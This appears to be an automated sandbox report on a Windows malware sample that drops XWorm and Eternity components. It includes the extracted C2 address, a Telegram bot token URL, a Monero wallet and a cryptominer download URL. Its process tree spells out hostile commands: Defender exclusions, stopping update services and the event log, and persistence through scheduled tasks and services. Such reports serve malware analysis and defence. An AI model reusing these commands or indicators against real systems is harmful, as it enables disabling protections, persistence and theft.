Analysis
-
max time kernel
151s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
28-03-2024 00:56
General
-
Target
x326.exe
-
Size
455KB
-
MD5
c8d9593196962fa5d706a207c16674cd
-
SHA1
686a8e674e6615d5cd91f7b2cba0c755054b3f69
-
SHA256
a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
-
SHA512
5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
-
SSDEEP
12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
Malware Config
Extracted
xworm
5.1
104.194.9.116:7000
bUezpCDHVjUVS3W9
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845
Extracted
eternity
47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q
-
payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 7 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exeC:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\x326.exe"C:\Users\Admin\AppData\Local\Temp\x326.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\envnmy.exe"C:\Users\Admin\AppData\Local\Temp\envnmy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\wab.exe"C:\Program Files\Windows Mail\wab.exe"4⤵
- Drops startup file
-
-
C:\Program Files\Windows Mail\wab.exe"C:\Program Files\Windows Mail\wab.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vvifah.exe"C:\Users\Admin\AppData\Local\Temp\vvifah.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\axwtcr.exe"C:\Users\Admin\AppData\Local\Temp\axwtcr.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "msbuild" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe"C:\Users\Admin\AppData\Local\ServiceHub\msbuild.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\xcukme.exe"C:\Users\Admin\AppData\Local\Temp\xcukme.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AHIMMUFK"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "AHIMMUFK"5⤵
- Launches sc.exe
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"4⤵
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
-
-
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exeC:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
51KB
MD5a5d8dc023c41ebb43e246e09a4ab7344
SHA1fca59a613fadd61e862d95b7c86df83190307ec9
SHA25648964056f33d8dd9d1e141e5dedddf645acbb9fa85075ab19bd4590fb3f066df
SHA512cc47a29abf1580afbe1044f565ca400a6fe0b754539d4866bc3e93c50df311bc397d027d901a489d8cf28db2931449780f5337c359841a9311488b8d64082220
-
Filesize
321B
MD5baf5d1398fdb79e947b60fe51e45397f
SHA149e7b8389f47b93509d621b8030b75e96bb577af
SHA25610c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8
SHA512b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413
-
Filesize
256KB
MD58fdf47e0ff70c40ed3a17014aeea4232
SHA1e6256a0159688f0560b015da4d967f41cbf8c9bd
SHA256ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82
SHA512bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
393KB
MD53f3a51617811e9581aba50376599efa6
SHA19b26aa73f43a4db9b216b90d1aa3e2e4d602fde8
SHA2565f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37
SHA5129ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3
-
Filesize
627KB
MD5df5334af39271bda89d9ac884f203f2c
SHA1cef639c80598577e4068ee9acf084fbd5d21d9c1
SHA256a2002c8e863f630af9fd7bbfbbc4c3f2deae17a513e0cdbc62cf72bb488bdbed
SHA512e29e252d3ac0c57a97238242bd11014c876cd52ca64d04ea6886977801431be3abd7ab4c4cbbe80540aa5e1b8e4f9c0f47970cda52731425423c98c0bcae645d
-
Filesize
756KB
MD5d76027fe4cfd48c7f8999c796e50e731
SHA15026422e84bf445e2d141529e2b808187a30d9f6
SHA256148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799
SHA5122e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d
-
Filesize
12.1MB
MD5618328df20388d5ed3f44d36d7771886
SHA1b4ddb6b9beae208c4ef5d4f7e12f7dcf44e5e9b0
SHA256e489c668b9cccbfa23af8c1be2754983b2fcce21a7e060ac68b8dce7b6239530
SHA512d59ecc2ab5a3def28e38a3eb844ba43f086b8821368f23d0bfdc98349f2bc646265033bbf7639dd226be40ca4482e56a16a2c40095ed4d7cbfaaeba3726c5bdd
-
Filesize
12.2MB
MD5daae7ab5e1324bee8a1c4e95b078838a
SHA1989815a9a306835bd670a3ce9b5ecb842e390788
SHA25693f0e71979ee8f6f0a150a66d1cfba3e3b95edad1eed0f43b1c6a2fa9a407351
SHA512ba30fce5b98a7b20889442cb7a337022f977486410b8d3ae76f24a2edbb5fe62308cdcc167cf70f41d91ebef52843dc10997ec15f510ad02ab753381bf015465
-
Filesize
10.2MB
MD5c8d58439084cafa75c41a07313b7160c
SHA108d97fd615d5fac241600002788d50df9d81f87a
SHA256225b4e0a3f21666aee522f910a64b77954cda810174ec8327255b0bef2703b09
SHA512d0fb41a540bb9401e449fbc36c0c87a32c5f8923bc4097b90ab88cc9143dbbd8f805649cb17d118b1818af4bad18c35f1f426f442d99dbc9d547f139396d0b71
-
Filesize
3.1MB
MD586e00d529b3b454a84b942ac916211e3
SHA1021c733e5448436b384bf0d3a0ba81f4d0d93f9a
SHA25630e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53
SHA5129a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
144KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
172KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
7.7MB
-
Filesize
56KB
-
Filesize
248KB
-
Filesize
248KB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
352KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
100KB
-
Filesize
112KB
-
Filesize
132KB
-
Filesize
80KB
-
Filesize
112KB
-
Filesize
88KB
-
Filesize
400KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
40KB
-
Filesize
192KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
296KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
408KB
-
Filesize
704KB
-
Filesize
128KB
-
Filesize
216KB
-
Filesize
216KB
-
Filesize
80KB
-
Filesize
144KB
-
Filesize
156KB
-
Filesize
112KB
-
Filesize
1.6MB
-
Filesize
100KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
2.3MB
-
Filesize
72KB
-
Filesize
40KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
32KB
-
Filesize
56KB
-
Filesize
1.5MB
-
Filesize
624KB
-
Filesize
496KB
-
Filesize
120KB
-
Filesize
3.8MB
-
Filesize
136KB
-
Filesize
744KB
-
Filesize
384KB
-
Filesize
272KB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
104KB
-
Filesize
56KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
112KB
-
Filesize
80KB
-
Filesize
64KB
-
Filesize
96KB
-
Filesize
1.4MB
-
Filesize
656KB
-
Filesize
100KB
-
Filesize
136KB
-
Filesize
2.3MB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
112KB
-
Filesize
1.6MB
-
Filesize
112KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
2.8MB
-
Filesize
2.8MB